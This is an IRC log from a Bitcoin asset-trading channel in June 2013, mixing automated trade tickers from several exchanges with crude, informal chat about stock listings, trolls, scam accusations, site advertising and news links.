benkay: been in SP netops and design for 10 years Jun 26 02:58:40 wasn't thios fuckwit asking how to get on mpex five minutes ago ? Jun 26 02:59:52 mircea yea until i read a little into you shady past Jun 26 03:00:15 an exchange with no assets on it but your own? nice try scum. Jun 26 03:00:42 tiberius 2.0 Jun 26 03:01:32 baww i miss tiberius Jun 26 03:01:41 that was pro-grade trolling Jun 26 03:03:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.034172 = 0.0683 BTC [+] Jun 26 03:03:38 right-o. Jun 26 03:03:55 nah, the pietilla guy was pro-grade. Jun 26 03:03:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.034 = 0.17 BTC [-] Jun 26 03:04:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.033752 = 0.1013 BTC [-] Jun 26 03:04:03 tiberius was just in the really determined trying hard camp Jun 26 03:04:44 [BTCTC] [TAT.ASICMINER] 27 @ 0.033753 = 0.9113 BTC [+] Jun 26 03:04:46 [BTCTC] [TAT.ASICMINER] 12 @ 0.033752 = 0.405 BTC [-] Jun 26 03:04:47 [BTCTC] [TAT.ASICMINER] 57 @ 0.03375 = 1.9238 BTC [-] Jun 26 03:04:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.033711 = 0.1348 BTC [-] Jun 26 03:05:35 [BTCTC] [ASICMINER-PT] 1 @ 3.4179 BTC [+] Jun 26 03:07:38 mircea shouldnt you be out selling sheep in your local market? Jun 26 03:07:47 [BTCTC] [GSDPT] 13 @ 0.00248 = 0.0322 BTC [+] Jun 26 03:14:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.033711 = 0.4045 BTC [-] Jun 26 03:14:46 mircea popescu is running a boiler room type scam Jun 26 03:14:56 hes selling trash to people Jun 26 03:16:00 reggin!*@* added to ignore list. Jun 26 03:19:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0335 BTC [-] Jun 26 03:19:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.0335 = 0.1005 BTC [-] Jun 26 03:23:03 it took me some time to see what reggin means Jun 26 03:24:48 uh Jun 26 03:24:53 had you not mentioned it... Jun 26 03:26:12 hey mircea_popescu Jun 26 03:26:15 heya Jun 26 03:26:42 this maybe a convo for private chat but meh what the heck Jun 26 03:26:51 so pm lol Jun 26 03:26:53 okay Jun 26 03:28:08 [MPEX] [S.MPOE] 29950 @ 0.00081475 = 24.4018 BTC [+] Jun 26 03:31:19 [BTCTC] [TAT.ASICMINER] 89 @ 0.0335 = 2.9815 BTC [-] Jun 26 03:34:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.034159 = 0.0683 BTC [+] Jun 26 03:37:26 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 26 03:43:28 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.00535 = 0.1338 BTC [-] Jun 26 03:44:01 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.005306 = 0.2335 BTC [-] Jun 26 03:44:31 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.005302 = 0.5302 BTC [-] Jun 26 03:44:36 [MPEX] [S.MPOE] 424 @ 0.00081033 = 0.3436 BTC [-] Jun 26 03:44:53 [MPEX] [S.MPOE] 4550 @ 0.00081667 = 3.7158 BTC [+] Jun 26 03:47:23 [BTCTC] [S.DICE-PT] 4 @ 0.00235 = 0.0094 BTC [-] Jun 26 03:47:25 [BTCTC] [S.DICE-PT] 3 @ 0.0023 = 0.0069 BTC [-] Jun 26 03:48:34 [HAVELOCK] [ASICM] 21 @ 0.034 = 0.714 BTC [-] Jun 26 03:50:55 [HAVELOCK] [ASICM] 96 @ 0.034 = 3.264 BTC [-] Jun 26 03:51:57 dat was tiberius Jun 26 03:52:42 interdasting Jun 26 03:52:44 https://twitter.com/EQTW/status/349678612330455040 Jun 26 03:52:55 .gov agency accepting buttcoin donations Jun 26 03:53:16 [HAVELOCK] [ASICM] 21 @ 0.034 = 0.714 BTC [-] Jun 26 03:53:53 wtf, why is blockchain showing fiat balances Jun 26 03:56:01 dub because they thought it's keeeewl and didn't think it through. Jun 26 03:59:15 no way to change it back to bitcoin Jun 26 03:59:37 click a sum Jun 26 03:59:44 oh wait Jun 26 03:59:58 I saw mBTC in the list, found BTC now Jun 26 04:00:17 [BTCTC] [BASIC-MINING] 1 @ 1.649999 BTC [+] Jun 26 04:00:42 [BTCTC] [BASIC-MINING] 1 @ 1.65 BTC [+] Jun 26 04:02:37 [BTCTC] [S.DICE-PT] 1 @ 0.0024 BTC [+] Jun 26 04:06:26 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 26 04:06:47 [BTCTC] [COG.F] 1 @ 3.4 BTC [-] Jun 26 04:07:40 [BTCTC] [ASICMINER-PT] 1 @ 3.41799 BTC [+] Jun 26 04:08:11 [BTCTC] [TAT.VIRTUALMINE] 75 @ 0.005526 = 0.4145 BTC [+] Jun 26 04:11:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005521 BTC [-] Jun 26 04:13:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0337 BTC [-] Jun 26 04:14:51 [BTCTC] [ASICMINER-PT] 1 @ 3.41799 BTC [+] Jun 26 04:15:24 [BTCTC] [ASICMINER-PT] 1 @ 3.418 BTC [+] Jun 26 04:24:51 [BTCTC] [RSM] 3 @ 0.024254 = 0.0728 BTC [+] Jun 26 04:26:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.0337 = 0.2022 BTC [-] Jun 26 04:37:12 [BTCTC] [TAT.VIRTUALMINE] 148 @ 0.005492 = 0.8128 BTC [-] Jun 26 04:39:29 [BTCTC] [TAT.VIRTUALMINE] 224 @ 0.005303 = 1.1879 BTC [-] Jun 26 04:39:51 [BTCTC] [ASICMINER-PT] 1 @ 3.418 BTC [+] Jun 26 04:42:57 [BTCTC] [BASIC-MINING] 1 @ 1.66 BTC [+] Jun 26 04:42:59 [BTCTC] [BASIC-MINING] 4 @ 1.6799 = 6.7196 BTC [+] Jun 26 04:43:00 [BTCTC] [BASIC-MINING] 1 @ 1.68 BTC [+] Jun 26 04:43:01 [BTCTC] [BASIC-MINING] 7 @ 1.75 = 12.25 BTC [+] Jun 26 04:56:57 Sign this, share this with everyone you know, save the world: https://petitions.whitehouse.gov/petition/allow-tesla-motors-sell-directly-consumers-all-50-states/bFN7NHQR Jun 26 05:04:52 [MPEX] [S.MPOE] 7850 @ 0.00081714 = 6.4145 BTC [+] Jun 26 05:10:50 [MPEX] [S.MPOE] 6550 @ 0.00081714 = 5.3523 BTC [+] Jun 26 05:14:03 [BTCTC] [TAT.ASICMINER] 22 @ 0.034 = 0.748 BTC [+] Jun 26 05:14:07 [BTCTC] [TAT.ASICMINER] 60 @ 0.034163 = 2.0498 BTC [+] Jun 26 05:14:09 [BTCTC] [TAT.ASICMINER] 15 @ 0.034164 = 0.5125 BTC [+] Jun 26 05:14:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.034246 = 1.7123 BTC [+] Jun 26 05:14:12 [BTCTC] [TAT.ASICMINER] 50 @ 0.034248 = 1.7124 BTC [+] Jun 26 05:14:14 [BTCTC] [TAT.ASICMINER] 60 @ 0.034249 = 2.0549 BTC [+] Jun 26 05:14:14 [BTCTC] [TAT.ASICMINER] 78 @ 0.034282 = 2.674 BTC [+] Jun 26 05:14:20 [BTCTC] [ASICMINER-PT] 1 @ 3.418 BTC [+] Jun 26 05:14:22 [BTCTC] [ASICMINER-PT] 1 @ 3.419 BTC [+] Jun 26 05:15:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.034161 = 0.1708 BTC [-] Jun 26 05:18:39 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [-] Jun 26 05:18:48 [MPEX] [S.MPOE] 3548 @ 0.00081874 = 2.9049 BTC [+] Jun 26 05:18:50 [MPEX] [S.MPOE] 7500 @ 0.00081864 = 6.1398 BTC [-] Jun 26 05:19:01 [MPEX] [S.MPOE] 9752 @ 0.00081675 = 7.9649 BTC [-] Jun 26 05:20:44 [HAVELOCK] [ASICM] 11 @ 0.034 = 0.374 BTC [-] Jun 26 05:20:55 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [-] Jun 26 05:21:35 ;;ticker Jun 26 05:21:36 MtGox BTCUSD ticker | Best bid: 104.53137, Best ask: 104.85651, Bid-ask spread: 0.32514, Last trade: 104.53137, 24 hour volume: 96443.76823665, 24 hour low: 100.00000, 24 hour high: 109.98000, 24 hour vwap: 104.14094 Jun 26 05:25:26 [BTCTC] [ASICMINER-PT] 1 @ 3.419 BTC [+] Jun 26 05:25:28 [BTCTC] [ASICMINER-PT] 4 @ 3.42 = 13.68 BTC [+] Jun 26 05:25:50 [BTCTC] [ASICMINER-PT] 15 @ 3 = 45 BTC [-] Jun 26 05:26:36 [BTCTC] [DMS.MINING] 6 @ 0.020725 = 0.1244 BTC [-] Jun 26 05:26:38 [BTCTC] [DMS.MINING] 20 @ 0.020725 = 0.4145 BTC [-] Jun 26 05:27:20 [BTCTC] [DMS.PURCHASE] 26 @ 0.053891 = 1.4012 BTC [-] Jun 26 05:27:45 [BTCTC] [ASICMINER-PT] 3 @ 3.42 = 10.26 BTC [+] Jun 26 05:28:15 http://www.forbes.com/sites/jonmatonis/2013/06/25/exante-adds-share-trading-to-global-bitcoin-fund/ Jun 26 05:28:18 Exante Adds Share Trading To Global Bitcoin Fund - Forbes Jun 26 05:29:41 http://learn.adafruit.com/piminer-raspberry-pi-bitcoin-miner/initial-setup-and-assembly Jun 26 05:29:44 Initial Setup & Overview | PiMiner Raspberry Pi Bitcoin Miner | Adafruit Learning System Jun 26 05:31:12 herpderp. Jun 26 05:31:43 [BTCTC] [ASICMINER-PT] 11 @ 3.42 = 37.62 BTC [+] Jun 26 05:32:29 https://just-dice.com/ http://bitbet.us/ Jun 26 05:32:33 the evil of advertising! Jun 26 05:32:36 just-dice Jun 26 05:33:04 [BTCTC] [TAT.ASICMINER] 50 @ 0.034141 = 1.7071 BTC [-] Jun 26 05:33:55 i notice some of the AM regulars bit Jun 26 05:36:22 more outreach still needed Jun 26 05:36:22 oh geez Jun 26 05:36:22 just saw the just dice Jun 26 05:36:22 ad Jun 26 05:36:22 lol Jun 26 05:36:22 [BTCTC] [TAT.ASICMINER] 24 @ 0.034138 = 0.8193 BTC [-] Jun 26 05:36:43 [BTCTC] [LTC-MINING] 1 @ 0.292011 BTC [-] Jun 26 05:37:25 [BTCTC] [LTC-MINING] 1 @ 0.292011 BTC [-] Jun 26 05:37:27 [BTCTC] [LTC-MINING] 3 @ 0.29201 = 0.876 BTC [-] Jun 26 05:37:28 [BTCTC] [LTC-MINING] 7 @ 0.292 = 2.044 BTC [-] Jun 26 05:41:34 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 26 05:41:38 http://fuckyounofuck.me/post/53873099571 << don't make me assume my ultimate form Jun 26 05:41:45 Fuck you. No, fuck me. Jun 26 05:43:59 lol, then the next car pulls Jun 26 05:44:01 up Jun 26 05:45:03 Don't you fucking run away from me you fucking fat meatbag, I'll end you. Jun 26 05:45:31 lol all for McNuggets Jun 26 05:46:28 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 26 05:47:40 [BTCTC] [MININGCO.ETF] 1 @ 0.88 BTC [+] Jun 26 05:47:54 [MPEX] [S.MPOE] 14300 @ 0.00081757 = 11.6913 BTC [+] Jun 26 05:48:11 [MPEX] [S.MPOE] 6950 @ 0.00081675 = 5.6764 BTC [-] Jun 26 05:48:13 [BTCTC] [MININGCO.ETF] 2 @ 0.88 = 1.76 BTC [+] Jun 26 05:48:40 [BTCTC] [ASICMINER-PT] 1 @ 3.448 BTC [+] Jun 26 05:51:12 [BTCTC] [PAJKA.BOND] 5 @ 0.068 = 0.34 BTC [-] Jun 26 05:52:09 [HAVELOCK] [ASICM] 1 @ 0.03371 BTC [-] Jun 26 05:52:18 Angry bitch. Jun 26 05:52:55 [HAVELOCK] [ASICM] 1 @ 0.03370002 BTC [-] Jun 26 05:54:01 [BTCTC] [PAJKA.BOND] 5 @ 0.069 = 0.345 BTC [+] Jun 26 05:54:25 [BTCTC] [PAJKA.BOND] 2 @ 0.07 = 0.14 BTC [+] Jun 26 05:55:03 [BTCTC] [BASIC-MINING] 1 @ 1.76 BTC [+] Jun 26 05:55:05 [BTCTC] [BASIC-MINING] 1 @ 1.779 BTC [+] Jun 26 05:56:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 26 05:56:53 [BTCTC] [TAT.ASICMINER] 14 @ 0.03345 = 0.4683 BTC [-] Jun 26 05:57:21 [HAVELOCK] [ASICM] 43 @ 0.0337 = 1.4491 BTC [-] Jun 26 05:57:53 [BTCTC] [BASIC-MINING] 1 @ 1.81 BTC [+] Jun 26 06:00:04 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.005406 = 0.8109 BTC [+] Jun 26 06:00:41 [BTCTC] [BASIC-MINING] 1 @ 1.854637 BTC [+] Jun 26 06:01:18 I want chicken McNuggets Jun 26 06:01:43 [BTCTC] [BTC-BOND] 10 @ 0.009998 = 0.1 BTC [+] Jun 26 06:02:06 NAO Jun 26 06:02:16 In the hottest gray area on the net Jun 26 06:04:08 [MPEX] [S.MPOE] 11608 @ 0.00081675 = 9.4808 BTC [-] Jun 26 06:04:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.0342 = 0.1026 BTC [+] Jun 26 06:05:32 mod6: Jun 26 06:05:35 ;;seen mod6 Jun 26 06:05:35 mod6 was last seen in #bitcoin-assets 20 minutes and 3 seconds ago: lol all for McNuggets Jun 26 06:05:45 sup Jun 26 06:05:52 lol Jun 26 06:05:56 he comes out of his hiding Jun 26 06:06:05 from the evil overlords who work him to death Jun 26 06:06:07 poor mod6 Jun 26 06:06:08 lol Jun 26 06:06:12 ;;seen mircea_popescu Jun 26 06:06:12 mircea_popescu was last seen in #bitcoin-assets 33 minutes and 38 seconds ago: the evil of advertising! Jun 26 06:06:28 been working insaneo hours lately. but good news! looks like i'll be done with this gig for good end of july. Jun 26 06:06:37 frickin finally. Jun 26 06:08:28 [BTCTC] [ASICMINER-PT] 1 @ 3.44999 BTC [+] Jun 26 06:09:14 [HAVELOCK] [HIM] 1 @ 0.269998 BTC [+] Jun 26 06:09:24 http://www.dailymail.co.uk/news/article-2345937/GM-food-menu-Parliaments-restaurant-despite-ministers-telling-public-drop-opposition.html Jun 26 06:09:25 loller Jun 26 06:09:27 GM food off the menu in Parliament's restaurant despite ministers telling the public to drop their o Jun 26 06:11:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.034192 = 0.1368 BTC [-] Jun 26 06:11:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.034192 = 0.5471 BTC [-] Jun 26 06:15:37 food-like substance is good enough for the proles, but not the Inner Party! Jun 26 06:17:26 “These charges send a clear message,” the spokesman said. “In the United States, you can’t spy on people.” Jun 26 06:17:33 http://www.newyorker.com/online/blogs/borowitzreport/2013/06/us-seemingly-unaware-of-irony-in-accusing-snowden-of-spying.html Jun 26 06:17:38 U.S. Seemingly Unaware of Irony in Accusing Snowden of Spying : The New Yorker Jun 26 06:20:28 Love that Jun 26 06:20:51 "In the United States, you can't spy on people." LOL Jun 26 06:21:28 [BTCTC] [ASICMINER-PT] 1 @ 3.44999 BTC [+] Jun 26 06:22:28 olo Jun 26 06:23:35 Waiting for, "In the United States, you can't laugh at people that spy on you" Jun 26 06:23:51 yes I can Jun 26 06:23:53 I do it all the time Jun 26 06:24:19 And let's make sure we cherish that privilege Jun 26 06:30:57 “Only by bringing Mr. Snowden to justice can we safeguard the most precious of American rights: privacy,” added the spokesman, apparently serious. Jun 26 06:33:03 smh Jun 26 06:34:05 TAT: I don't normally read the New Yorker, but it looks like the report was meant as a joke Jun 26 06:35:02 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005836 = 0.0292 BTC [+] Jun 26 06:35:29 ah Jun 26 06:35:31 [BTCTC] [DMS.SELLING] 1 @ 0.034001 BTC [-] Jun 26 06:35:32 me either Jun 26 06:35:34 i skimmed Jun 26 06:35:46 good thing i'm not a reporter! Jun 26 06:38:01 [BTCTC] [DMS.PURCHASE] 1 @ 0.053891 BTC [-] Jun 26 06:38:18 [BTCTC] [ASICMINER-PT] 5 @ 3.44999 = 17.25 BTC [+] Jun 26 06:40:31 apparently serious is priceless. Jun 26 06:41:04 Here's something that's not a joke. "for all anyone knows [me] and [friedcat] are the same person." implying that I can't use friedcat's statements as arguments that AM is earning more on their hardware than I am earning on my asset. Jun 26 06:41:17 https://bitcointalk.org/index.php?topic=241415.msg2581037#msg2581037 Jun 26 06:41:24 P/B ratio, or how to not get raped in the Bitcoin securities markets Jun 26 06:43:00 furuknap: I don't get it. What does it mean? Jun 26 06:43:03 unrelated, i see new lows for gold and silver Jun 26 06:43:19 tortilla guy will need a while to recover Jun 26 06:43:28 are bitbet financial statements available somewhere? Jun 26 06:43:43 It means this guy seems to say that because nobody knows whether friedcat and me are the same person, you can't trust what friedcat says about AM. Jun 26 06:44:03 hey guys Jun 26 06:44:18 furuknap: but why would anyone care what this guy says? Jun 26 06:44:59 I don't know, he was just asking weird questions so I responded. Jun 26 06:45:19 furuknap: you've been trolled -- registered June 20 Jun 26 06:45:21 topace_ https://bitcointalk.org/index.php?topic=141458.0 Jun 26 06:46:00 kakobrekla, thanks, listing says "on website and on bitcointalk" and i couldn't find it on the website anywhere.. maybe you should make a link in the FAQ to the bitcointalk postings.. Jun 26 06:46:53 i didnt sign that part! Jun 26 06:47:14 That's fine, the questions were weird in any case. I responded with factual information, I don't see why that would hurt anyone. Jun 26 06:47:27 heh Jun 26 06:47:59 i thought it was trilema website tbh Jun 26 06:48:04 since they are published there Jun 26 06:48:42 kakobrekla mpoe-pr thinks he's back as some recruiter woman Jun 26 06:49:10 mircea_popescu: were you still doing those put orders or was that someone lese i got mistaken? Jun 26 06:49:37 hm ? Jun 26 06:50:10 who is back? Jun 26 06:51:42 pietila Jun 26 06:51:50 ah ah Jun 26 06:52:37 i notice everyone (ie, the 3 people inviolved) happily ignored the point about carrying cost of book. Jun 26 06:52:43 a well. slow going. Jun 26 06:53:06 [BTCTC] [S.DICE-PT] 14 @ 0.002301 = 0.0322 BTC [-] Jun 26 06:55:32 [BTCTC] [ASICMINER-PT] 1 @ 3.44999 BTC [+] Jun 26 06:57:31 [BTCTC] [ASICMINER-PT] 1 @ 3.1 BTC [-] Jun 26 06:58:16 [BTCTC] [ASICMINER-PT] 3 @ 3.4 = 10.2 BTC [+] Jun 26 06:58:55 [BTCTC] [ASICMINER-PT] 1 @ 3.416 BTC [+] Jun 26 06:58:56 [BTCTC] [ASICMINER-PT] 1 @ 3.4005 BTC [-] Jun 26 06:58:58 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Jun 26 06:58:59 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Jun 26 06:59:01 [BTCTC] [ASICMINER-PT] 3 @ 3.3706 = 10.1118 BTC [-] Jun 26 06:59:39 [BTCTC] [TAT.ASICMINER] 550 @ 0.03 = 16.5 BTC [-] Jun 26 07:00:03 [BTCTC] [TAT.ASICMINER] 101 @ 0.033805 = 3.4143 BTC [+] Jun 26 07:00:05 [BTCTC] [TAT.ASICMINER] 101 @ 0.033804 = 3.4142 BTC [-] Jun 26 07:00:07 [BTCTC] [TAT.ASICMINER] 140 @ 0.033456 = 4.6838 BTC [-] Jun 26 07:00:18 [BTCTC] [TAT.ASICMINER] 16 @ 0.033453 = 0.5352 BTC [-] Jun 26 07:00:56 [BTCTC] [BASIC-MINING] 1 @ 1.86 BTC [+] Jun 26 07:01:26 [BTCTC] [BASIC-MINING] 1 @ 1.898 BTC [+] Jun 26 07:02:30 [BTCTC] [BASIC-MINING] 16 @ 1.899999 = 30.4 BTC [+] Jun 26 07:04:15 [BTCTC] [TAT.ASICMINER] 42 @ 0.03414 = 1.4339 BTC [+] Jun 26 07:06:57 [BTCTC] [DMS.MINING] 9 @ 0.021183 = 0.1906 BTC [+] Jun 26 07:08:28 [BTCTC] [ASICMINER-PT] 1 @ 3.449882 BTC [+] Jun 26 07:10:03 [BTCTC] [ASICMINER-PT] 3 @ 3.449883 = 10.3496 BTC [+] Jun 26 07:22:35 [BTCTC] [TAT.ASICMINER] 50 @ 0.033896 = 1.6948 BTC [-] Jun 26 07:25:53 [BTCTC] [TAT.VIRTUALMINE] 47 @ 0.00579 = 0.2721 BTC [-] Jun 26 07:27:41 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.005788 = 0.0521 BTC [-] Jun 26 07:29:54 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 26 07:33:03 [BTCTC] [TAT.VIRTUALMINE] 211 @ 0.005304 = 1.1191 BTC [-] Jun 26 07:33:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.033885 = 0.3389 BTC [-] Jun 26 07:33:33 [BTCTC] [ASICMINER-PT] 1 @ 3.44999 BTC [+] Jun 26 07:38:41 [BTCTC] [DMS.MINING] 9 @ 0.020711 = 0.1864 BTC [-] Jun 26 07:38:43 [BTCTC] [DMS.MINING] 1 @ 0.02071 BTC [-] Jun 26 07:39:32 [BTCTC] [ASICMINER-PT] 1 @ 3.44999 BTC [+] Jun 26 07:41:12 [BTCTC] [DMS.PURCHASE] 10 @ 0.053891 = 0.5389 BTC [-] Jun 26 07:44:24 [BTCTC] [BASIC-MINING] 2 @ 1.899999 = 3.8 BTC [+] Jun 26 07:44:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.033884 = 0.1694 BTC [-] Jun 26 07:44:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.033884 = 0.0678 BTC [-] Jun 26 07:46:03 [HAVELOCK] [HIM] 60 @ 0.269999 = 16.1999 BTC [+] Jun 26 07:46:28 [BTCTC] [TAT.ASICMINER] 40 @ 0.033885 = 1.3554 BTC [+] Jun 26 07:47:15 [BTCTC] [TAT.ASICMINER] 29 @ 0.0339 = 0.9831 BTC [+] Jun 26 07:47:36 [HAVELOCK] [ASICM] 28 @ 0.0337 = 0.9436 BTC [-] Jun 26 07:48:25 [HAVELOCK] [HIM] 2 @ 0.259 = 0.518 BTC [-] Jun 26 07:53:12 [BTCTC] [ASICMINER-PT] 5 @ 3.4499 = 17.2495 BTC [-] Jun 26 07:55:51 [BTCTC] [ASICMINER-PT] 1 @ 3.43 BTC [-] Jun 26 08:05:40 [MPEX] [S.MPOE] 5908 @ 0.00082042 = 4.847 BTC [+] Jun 26 08:05:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.034264 BTC [+] **** BEGIN LOGGING AT Wed Jun 26 15:07:08 2013 Jun 26 15:11:04 [MPEX] [S.MPOE] 12500 @ 0.00081566 = 10.1958 BTC [-] Jun 26 15:11:18 lmao ThickAsThieves Jun 26 15:11:28 YOU DUN GOOFED THE AD NAO BOI ? Jun 26 15:12:38 [BTCTC] [BITVPS] 1 @ 0.0011 BTC [-] Jun 26 15:13:16 i cant fucking win Jun 26 15:13:53 see ? this is why it's cool to be me. you can do anything you want. Jun 26 15:14:06 vagina advertising ? sure. ppl go hmmm and do it. Jun 26 15:14:07 i'm mentally preparing myself for such Jun 26 15:14:22 first version of my reply to the critics was Jun 26 15:14:23 publish whatever the fuck you want and call it a report ? eskimoblob goes nuts and that's that. Jun 26 15:14:43 There are people that do things, and there are people that point at people that do things. Jun 26 15:14:49 tell the developers they suck and why ? everyone hides for two days till they figure it;s safe to come out Jun 26 15:15:30 i'm gonna ground into fine paste all the idiots that think we should care what the us says next. Jun 26 15:15:49 always more work to do once you start down this path. Jun 26 15:16:49 and worst part is the AM thread gets worse daily Jun 26 15:16:54 [BTCTC] [ASICMINER-PT] 1 @ 3.442109 BTC [-] Jun 26 15:17:00 it's like watching somoene have a stroke Jun 26 15:17:05 you ain't seen nothing yet. Jun 26 15:17:13 watch it when it drops to .18 or so. Jun 26 15:17:21 [MPEX] [S.MPOE] 4900 @ 0.0008171 = 4.0038 BTC [+] Jun 26 15:18:17 count the people that go "hey, bought at .1 now it's .18, cool" Jun 26 15:18:22 at least some of them have jobs, it seems to be worst on the weekends Jun 26 15:18:27 hehe Jun 26 15:19:08 dooglus is lucky in that i'm there, otherwise for daring to go from 220 to ~94 site profit (ie from 3.5x to ~1x expected revenue) Jun 26 15:19:17 he'd have probably been gutted in public Jun 26 15:19:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.03465 = 0.1386 BTC [+] Jun 26 15:19:59 he'll have his own problems too surely Jun 26 15:20:05 WTF ADZ!? Jun 26 15:20:18 How can i watch people gamble with ads in the way? Jun 26 15:20:52 right. he's made 5x more from ads than he did from running the site so far Jun 26 15:20:58 that and his current setup is like having the AM thread and trollbox and investors all in one place Jun 26 15:21:08 it's good. easy to ignore. Jun 26 15:21:28 [BTCTC] [BASIC-MINING] 1 @ 1.899 BTC [-] Jun 26 15:21:29 and every investor is a board member of course Jun 26 15:22:10 but good on him either way, great site Jun 26 15:22:19 how much did you pay? Jun 26 15:22:24 for bitbet.us ad Jun 26 15:22:34 not disclosed. Jun 26 15:22:40 zomg secrets Jun 26 15:22:42 hehe Jun 26 15:22:45 yee Jun 26 15:22:57 is the price to ad on bitbet disclosed? Jun 26 15:23:15 or must i go thru secret process Jun 26 15:23:18 you can put anything you want, it rotates you proportionally. Jun 26 15:23:28 cool Jun 26 15:23:38 yup, it's a great system, kakobrekla is an unknown innovator. Jun 26 15:24:13 it is a good idea Jun 26 15:24:20 is it perpetual too? Jun 26 15:24:25 i suppose it could be Jun 26 15:24:30 and work just the same Jun 26 15:24:32 1 month. obviously it was my idea, but you know what they say about ideas Jun 26 15:24:37 it's the implementation that cunts. Jun 26 15:24:58 ideas are like assholes, mircea has both Jun 26 15:26:11 [MPEX] [S.MPOE] 7600 @ 0.00081566 = 6.199 BTC [-] Jun 26 15:27:10 lol Jun 26 15:27:30 then why can't I put lube in ideas, genius? Jun 26 15:27:35 Scrat 1 TAT 0 Jun 26 15:27:44 if you can't maybe the problem is you're too loose. Jun 26 15:27:44 ideas can be lubed Jun 26 15:28:24 plus, shouldn't it be Jun 26 15:28:30 Dooglus 1 Scrat 0 Jun 26 15:28:32 ohhhhhh Jun 26 15:28:39 ;) Jun 26 15:28:42 meanie Jun 26 15:28:45 :'( Jun 26 15:28:53 lmao Jun 26 15:28:55 ahahaha Jun 26 15:29:07 sorry that was mean Jun 26 15:29:09 but Jun 26 15:29:10 for real Jun 26 15:29:16 now the ball is in your court Jun 26 15:29:16 a monthago scrat didn't want to ipo, today theres nothing to ipo. time solves all problems. Jun 26 15:29:23 yep Jun 26 15:29:52 sounds like Scrat had more than one person suggesting such Jun 26 15:30:17 i wasn't one btw. Jun 26 15:30:25 but how to innovate from here Scrat? Jun 26 15:30:27 gonna be tough Jun 26 15:30:34 but that doesnt mean impossible Jun 26 15:30:38 tough is what adds value. Jun 26 15:30:39 [BTCTC] [TAT.ASICMINER] 48 @ 0.03465 = 1.6632 BTC [+] Jun 26 15:30:58 well either tough on one's own or easy doing what i say. Jun 26 15:31:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.03465 = 0.3119 BTC [+] Jun 26 15:31:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004177 BTC [-] Jun 26 15:32:05 meanwhile Erik is still quiet Jun 26 15:32:11 sad Jun 26 15:32:25 [MPEX] [S.MPOE] 4850 @ 0.00081566 = 3.956 BTC [-] Jun 26 15:32:26 quiet is good. Jun 26 15:32:35 atm. starting a bitchfest would be the worst path. Jun 26 15:32:48 i meant quiet with news/dev/progress Jun 26 15:33:11 yeah bitching would get him nowhere Jun 26 15:33:17 yea. Jun 26 15:38:07 [BTCTC] [DMS.MINING] 99 @ 0.019996 = 1.9796 BTC [-] Jun 26 15:38:18 [BTCTC] [BITVPS] 99 @ 0.0011 = 0.1089 BTC [-] Jun 26 15:38:20 [BTCTC] [BITVPS] 26 @ 0.0011 = 0.0286 BTC [-] Jun 26 15:38:36 [BTCTC] [DMS.MINING] 90 @ 0.02 = 1.8 BTC [+] Jun 26 15:38:57 [BTCTC] [DMS.MINING] 20 @ 0.020717 = 0.4143 BTC [+] Jun 26 15:39:20 [BTCTC] [DMS.MINING] 150 @ 0.020731 = 3.1097 BTC [+] Jun 26 15:45:54 [BTCTC] [ASICMINER-PT] 2 @ 3.442115 = 6.8842 BTC [+] Jun 26 15:46:26 [BTCTC] [ASICMINER-PT] 1 @ 3.442114 BTC [-] Jun 26 15:46:28 [BTCTC] [ASICMINER-PT] 1 @ 3.4421 BTC [-] Jun 26 15:47:52 [BTCTC] [MININGCO.ETF] 3 @ 0.87999 = 2.64 BTC [-] Jun 26 15:52:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.03465 = 0.2772 BTC [+] Jun 26 15:52:52 anyone with issues loading just-dice.com ? Jun 26 15:52:57 yes Jun 26 15:53:20 doog just went to be, maybe ddosers were waiting Jun 26 15:53:45 ah the sneak attack Jun 26 15:53:53 bed* Jun 26 15:54:23 clever ddosers Jun 26 15:55:26 ThickAsThieves: nice ad! Jun 26 15:55:33 [BTCTC] [TAT.VIRTUALMINE] 174 @ 0.004177 = 0.7268 BTC [-] Jun 26 15:55:44 :) Jun 26 15:56:27 do you have a guess for your roi? Jun 26 15:56:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.03465 = 0.5198 BTC [+] Jun 26 15:57:02 for a 1 week ad? Jun 26 15:57:07 likely 0 Jun 26 15:57:39 idk, i bet the exposure will help when you launch the next investment Jun 26 15:57:55 maybe, exposure seems to be my enemy lately... Jun 26 15:58:27 just don't go sticking ping pong paddles where they don't belong and you'll be fine Jun 26 15:58:33 lol Jun 26 15:59:45 "is there a 